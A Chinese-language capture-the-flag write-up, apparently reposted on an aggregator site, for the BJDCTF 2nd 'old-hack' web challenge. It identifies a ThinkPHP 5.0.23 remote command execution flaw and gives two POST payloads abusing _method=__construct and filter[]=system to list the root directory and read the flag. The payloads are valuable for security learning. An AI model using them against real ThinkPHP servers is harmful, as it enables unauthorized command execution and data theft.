[BJDCTF 2nd]old-hack - 代码天地

[BJDCTF 2nd]old-hack

其他 2020-03-23 00:50:50 阅读次数: 0

进入首页:
首页告诉了我们是thinkphp5的漏洞。

知道了是哪个版本的话就搜一搜喽:最后发现是thinkphp5.0.23的命令执行

payload_1：查看根目录文件，发现flag位置

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

payload_2：读取flag

http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

猜你喜欢

转载自www.cnblogs.com/h3zh1/p/12549645.html

[BJDCTF 2nd]old-hack

[BJDCTF 2nd] old-hack

[BJDCTF 2nd]old-hack && [GXYCTF2019]禁止套娃

【学习笔记14】buu [BJDCTF 2nd]old-hack

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell

[BJDCTF 2nd]elementmaster

BJDCTF 2nd WEB

BJDCTF 2nd writeup

[BJDCTF 2nd]duangShell

[BJDCTF 2nd]文件探测

[BJDCTF 2nd]fake google

BJDCTF 2nd pwn Writeup

[BJDCTF 2nd]one_gadget

BUUOJ [BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup(二)

[BJDCTF 2nd]Schrödinger

BJDCTF 2nd(WEB复现)

BUUCTF：[BJDCTF 2nd]EasyBaBa

[BJDCTF 2nd]简单注入

[BJDCTF 2nd]r2t3

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

[BJDCTF 2nd]ydsneedgirlfriend2的wp

[BJDCTF 2nd]r2t4的wp

[BUUOJ记录] [BJDCTF 2nd]fake google

buuoj BJDCTF 2nd one_gadget

[BJDCTF 2nd]duangShell（反弹shell，swp泄露）

CTF-Pwn-[BJDCTF 2nd]one_gadget

CTF-Pwn-[BJDCTF 2nd]els

CTF-Pwn-[BJDCTF 2nd]diff

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)